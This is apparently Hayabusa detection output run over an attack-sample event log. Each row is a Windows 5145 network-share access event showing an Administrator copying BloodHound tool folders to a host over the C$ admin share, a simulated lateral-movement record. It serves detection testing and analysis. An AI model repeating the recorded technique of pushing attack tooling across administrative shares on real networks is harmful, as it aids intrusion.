2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
